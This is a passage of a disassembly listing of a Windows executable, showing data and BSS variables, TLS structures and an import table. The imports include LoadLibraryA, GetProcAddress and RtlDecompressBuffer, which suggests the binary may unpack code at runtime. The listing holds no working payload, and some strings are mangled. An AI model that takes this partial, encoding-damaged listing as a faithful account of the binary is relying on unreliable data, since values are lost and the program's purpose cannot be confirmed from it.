off_405018 dd offset sub_40151C ; DATA XREF: sub_40151C+F�r
; sub_40151C+35�r ...
off_40501C dd offset sub_4014E8 ; DATA XREF: sub_4015F8:loc_401646�r
off_405020 dd offset nullsub_1 ; DATA XREF: sub_4015F8:loc_401679�r
off_405024 dd offset nullsub_1 ; DATA XREF: CODE:loc_401B28�r
; DWORD dwFlags
dwFlags dd 0 ; DATA XREF: sub_401080+1�r
; sub_401094+4�r ...
off_40502C dd offset sub_401080 ; DATA XREF: sub_4010D0+4�r
; sub_401100+3F�r
off_405030 dd offset sub_401094 ; DATA XREF: sub_4010E8+4�r
; sub_401100+26�r
off_405034 dd offset sub_4010B8 ; DATA XREF: sub_401100+D�r
byte_405038 db 0 ; DATA XREF: sub_40115C+36�r
aRsu db 'ËÌÈÉ×ÏÈÍÎÛØÊÙÚÜİŞßàáã',0
aFxn@ db 'äå@',0
off_405054 dd offset nullsub_1 ; DATA XREF: sub_4015F8+38�r
dword_405058 dd 0 ; DATA XREF: sub_401C10�o
; sub_401C1C+33�o
dword_40505C dd 0 ; DATA XREF: sub_401C1C+1B�w
dword_405060 dd 0 ; DATA XREF: sub_401C1C+22�w
dword_405064 dd 0 ; DATA XREF: sub_401C1C+29�w
align 10h
dword_405070 dd 1 ; DATA XREF: sub_401F3C+F�r
dd 10h, 2, 20h, 4, 40h, 4, 40h, 5Ch dup(0)
align 1000h
DATA ends
; Section 3. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00003800
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 406000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
dword_406000 dd ? ; DATA XREF: CODE:00401B5B�w
dword_406004 dd ? ; DATA XREF: sub_40115C+9�r
; sub_40115C+16�r
dword_406008 dd ? ; DATA XREF: sub_401488+1C�r
; sub_40158C�w
dword_40600C dd ? ; DATA XREF: sub_40158C+A�w
dword_406010 dd ? ; DATA XREF: sub_4015F8+A0�r
; sub_4015F8+A9�r
dword_406014 dd ? ; DATA XREF: sub_40158C+29�w
dword_406018 dd ? ; DATA XREF: CODE:00401B6F�w
byte_40601C db ? ; DATA XREF: sub_40158C+2E�w
align 10h
dword_406020 dd ? ; DATA XREF: sub_4015F8+E�o
dword_406024 dd ? ; DATA XREF: CODE:00401B11�w
; CODE:00401B48�w
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_401080+7�r
; sub_401094+D�r ...
dword_40602C dd 2 dup(?) ; DATA XREF: sub_4014E8+4�o
; sub_4015C8+D�o ...
dword_406034 dd ? ; DATA XREF: sub_401570�r
; sub_40158C+14�w
dword_406038 dd ? ; DATA XREF: sub_40151C+20�w
; sub_40158C+1B�w
dword_40603C dd ? ; DATA XREF: sub_40158C+20�w
dd 6 dup(?)
dword_406058 dd ? ; DATA XREF: CODE:00401B19�r
; CODE:00401B22�r
dword_40605C dd ? ; DATA XREF: sub_401AA8�o
; sub_401AA8+19�w
dd 2Ah dup(?)
byte_406108 db ? ; DATA XREF: sub_401BD0�r
align 4
; DWORD TlsIndex
TlsIndex dd ? ; DATA XREF: sub_401B8C+C�r
; sub_401B8C+37�r ...
dd ?
dword_406114 dd ? ; DATA XREF: sub_401C1C+11�w
; sub_401C1C+16�r ...
dword_406118 dd ? ; DATA XREF: CODE:00401C71�w
; CODE:00401C90�w
dword_40611C dd ? ; DATA XREF: sub_401BD0:loc_401BFF�r
dword_406120 dd ? ; DATA XREF: CODE:00401CA9�w
; CODE:00401CC8�w
dword_406124 dd ? ; DATA XREF: CODE:00401D11�w
; CODE:00401D30�w
dword_406128 dd ? ; DATA XREF: CODE:00401EF1�w
; CODE:00401F10�w
dword_40612C dd ? ; DATA XREF: CODE:0040261D�w
; CODE:0040263C�w
; HMODULE hModule
hModule dd ? ; DATA XREF: sub_403818+3D�w
; sub_403818+58�r ...
dword_406134 dd ? ; DATA XREF: sub_403818+63�w
; sub_403818+84�r ...
dword_406138 dd ? ; DATA XREF: sub_403EB5+115�w
; sub_403EB5+11A�r ...
dword_40613C dd ? ; DATA XREF: sub_403EB5+10B�o
; sub_403EB5+12C�r ...
dword_406140 dd ? ; DATA XREF: sub_403EB5+127�o
; sub_403EB5+137�o ...
dword_406144 dd ? ; DATA XREF: sub_403EB5:loc_403FA5�o
; sub_403EB5+FF�r
dword_406148 dd ? ; DATA XREF: sub_403EB5+B1�w
; sub_403EB5+C9�r ...
dword_40614C dd ? ; DATA XREF: sub_403EB5:loc_403F70�r
; sub_403EB5+D6�o ...
align 1000h
BSS ends
;
; Imports from kernel32.dll
;
; Section 4. (virtual address 00007000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000400 ( 1024.)
; Offset to raw data for section: 00003800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Externs
; _idata
; DWORD __stdcall GetCurrentThreadId()
extrn __imp_GetCurrentThreadId:dword ; DATA XREF: GetCurrentThreadId�r
; void __stdcall ExitProcess(UINT uExitCode)
extrn __imp_ExitProcess:dword ; DATA XREF: ExitProcess�r
extrn RtlUnwind:dword ; DATA XREF: CODE:loc_401060�r
; void __stdcall RaiseException(DWORD dwExceptionCode,DWORD dwExceptionFlags,DWORD nNumberOfArguments,const ULONG_PTR *lpArguments)
extrn RaiseException:dword ; DATA XREF: CODE:loc_401058�r
; LPSTR __stdcall GetCommandLineA()
extrn __imp_GetCommandLineA:dword ; DATA XREF: GetCommandLineA�r
; BOOL __stdcall TlsSetValue(DWORD dwTlsIndex,LPVOID lpTlsValue)
extrn __imp_TlsSetValue:dword ; DATA XREF: TlsSetValue�r
; LPVOID __stdcall TlsGetValue(DWORD dwTlsIndex)
extrn __imp_TlsGetValue:dword ; DATA XREF: TlsGetValue�r
; HLOCAL __stdcall LocalAlloc(UINT uFlags,SIZE_T uBytes)
extrn __imp_LocalAlloc:dword ; DATA XREF: LocalAlloc�r
; HMODULE __stdcall GetModuleHandleA(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA:dword ; DATA XREF: GetModuleHandleA�r
; DWORD __stdcall GetModuleFileNameA(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn __imp_GetModuleFileNameA:dword ; DATA XREF: GetModuleFileNameA�r
; BOOL __stdcall FreeLibrary(HMODULE hLibModule)
extrn __imp_FreeLibrary:dword ; DATA XREF: FreeLibrary�r
; BOOL __stdcall HeapFree(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem)
extrn __imp_HeapFree:dword ; DATA XREF: HeapFree�r
; LPVOID __stdcall HeapReAlloc(HANDLE hHeap,DWORD dwFlags,LPVOID lpMem,SIZE_T dwBytes)
extrn __imp_HeapReAlloc:dword ; DATA XREF: HeapReAlloc�r
; LPVOID __stdcall HeapAlloc(HANDLE hHeap,DWORD dwFlags,SIZE_T dwBytes)
extrn __imp_HeapAlloc:dword ; DATA XREF: HeapAlloc�r
; HANDLE __stdcall GetProcessHeap()
extrn __imp_GetProcessHeap:dword ; DATA XREF: GetProcessHeap�r
;
; Imports from user32.dll
;
; LPSTR __stdcall CharNextA(LPCSTR lpsz)
extrn __imp_CharNextA:dword ; DATA XREF: CharNextA�r
;
; Imports from kernel32.dll
;
; void __stdcall Sleep(DWORD dwMilliseconds)
extrn __imp_Sleep:dword ; DATA XREF: Sleep�r
; HMODULE __stdcall LoadLibraryA(LPCSTR lpLibFileName)
extrn __imp_LoadLibraryA:dword ; DATA XREF: LoadLibraryA�r
; FARPROC __stdcall GetProcAddress(HMODULE hModule,LPCSTR lpProcName)
extrn __imp_GetProcAddress:dword ; DATA XREF: GetProcAddress�r
; HMODULE __stdcall GetModuleHandleA_0(LPCSTR lpModuleName)
extrn __imp_GetModuleHandleA_0:dword ; DATA XREF: GetModuleHandleA_0�r
; DWORD __stdcall GetModuleFileNameA_0(HMODULE hModule,LPCH lpFilename,DWORD nSize)
extrn __imp_GetModuleFileNameA_0:dword ; DATA XREF: GetModuleFileNameA_0�r
; void __stdcall ExitProcess_0(UINT uExitCode)
extrn __imp_ExitProcess_0:dword ; DATA XREF: ExitProcess_0�r
;
; Imports from ntdll.dll
;
extrn __imp_RtlDecompressBuffer:dword ; DATA XREF: RtlDecompressBuffer�r
; Section 5. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000000 ( 0.)
; Offset to raw data for section: 00003C00
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
_tls segment para public '' use32
assume cs:_tls
;org 408000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
TlsStart dd ? ; DATA XREF: .rdata:TlsDirectory�o
TlsEnd dd 3FFh dup(?) ; DATA XREF: .rdata:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 00009000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00003C00
; Flags 50000040: Data Shareable Readable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 409000h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsSizeOfZeroFill
TlsSizeOfZeroFill dd 0 ; DATA XREF: .rdata:TlsCallbacks_ptr�o
TlsCharacteristics dd 0
align 1000h
_rdata ends
end start